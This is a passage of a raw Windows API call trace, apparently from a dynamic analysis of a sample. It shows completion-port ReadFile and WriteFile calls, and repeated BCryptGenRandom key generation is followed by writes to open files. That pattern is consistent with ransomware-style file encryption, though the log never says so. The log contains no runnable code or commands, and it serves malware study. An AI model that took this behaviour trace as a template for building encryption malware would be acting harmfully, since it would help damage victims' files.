lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0118.876] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.888] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2bb6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.903] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x764, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0118.997] CloseHandle (hObject=0x3bc) returned 1 [0119.004] free (_Block=0x3df0008) [0119.004] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0119.006] CloseHandle (hObject=0x2f4) returned 1 [0119.008] free (_Block=0x1ff1e60) [0119.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0119.009] CloseHandle (hObject=0x308) returned 1 [0119.016] free (_Block=0x3e70008) [0119.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.527] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.528] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.528] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.528] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.528] free (_Block=0x3e305b8) [0120.528] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.528] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.529] free (_Block=0x77d8b8) [0120.529] free (_Block=0x2071c20) [0120.529] free (_Block=0x77d7a8) [0120.529] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.529] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.529] WriteFile (in: hFile=0x13c0, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.529] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.551] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb80, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.551] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.559] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2178, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0120.560] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.571] CloseHandle (hObject=0x308) returned 1 [0120.572] free (_Block=0x1ff1e60) [0120.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.579] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0120.579] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.588] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2606, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.597] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.606] ReadFile (in: hFile=0x2f4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x4278, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0120.612] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.622] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.622] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.623] free (_Block=0x3e305b8) [0120.623] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.623] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.623] free (_Block=0x77d8b8) [0120.623] free (_Block=0x2071c20) [0120.623] free (_Block=0x77d7a8) [0120.623] WriteFile (in: hFile=0x13c0, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.623] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.627] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.630] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.630] calloc (_Count=0x41, _Size=0x4) returned 0x77d858 [0120.630] free (_Block=0x3e305b8) [0120.630] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0120.630] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0120.630] free (_Block=0x2071c20) [0120.630] free (_Block=0x2071d30) [0120.630] free (_Block=0x77d858) [0120.630] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0120.631] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.631] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x829a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.632] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.660] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4dba, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.672] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3d40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.674] CloseHandle (hObject=0x340) returned 1 [0120.674] free (_Block=0x3d70450) [0120.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.709] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.710] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.710] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.710] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.710] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.710] free (_Block=0x3e305b8) [0120.710] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.710] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.711] free (_Block=0x77d8b8) [0120.711] free (_Block=0x2071c20) [0120.711] free (_Block=0x77d7a8) [0120.711] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.711] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.712] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x5520, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.755] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xb760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0120.755] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.761] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x6e34, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.786] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.786] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.786] free (_Block=0x3e305b8) [0120.786] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.786] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.787] free (_Block=0x77d8b8) [0120.787] free (_Block=0x2071c20) [0120.787] free (_Block=0x77d7a8) [0120.787] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0120.787] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.799] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.799] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.799] free (_Block=0x3e305b8) [0120.799] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.799] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.800] free (_Block=0x77d8b8) [0120.800] free (_Block=0x2071c20) [0120.800] free (_Block=0x77d7a8) [0120.800] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0120.800] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.812] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.812] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.812] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.812] free (_Block=0x3e305b8) [0120.813] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.813] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.813] free (_Block=0x77d8b8) [0120.813] free (_Block=0x2071c20) [0120.813] free (_Block=0x77d7a8) [0120.813] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.813] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.822] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.822] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.822] free (_Block=0x3e305b8) [0120.823] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.823] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.823] free (_Block=0x77d8b8) [0120.823] free (_Block=0x2071c20) [0120.823] free (_Block=0x77d7a8) [0120.823] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0120.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.839] CloseHandle (hObject=0x3bc) returned 1 [0120.839] free (_Block=0x1ff1e60) [0120.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.849] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.850] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.850] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.851] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.851] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0120.851] free (_Block=0x3e305b8) [0120.851] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0120.851] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0120.852] free (_Block=0x77d8b8) [0120.852] free (_Block=0x2071c20) [0120.852] free (_Block=0x77d7a8) [0120.852] WriteFile (in: hFile=0x2f4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0120.852] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0120.854] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0120.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.855] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0120.855] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0120.856] calloc (_Count=0x41, _Size=0x4) returned 0x77d858 [0120.856] free (_Block=0x3e305b8) [0120.856] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0120.856] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0120.857] free (_Block=0x2071c20) [0120.857] free (_Block=0x2071d30) [0120.857] free (_Block=0x77d858) [0120.857] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0120.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, 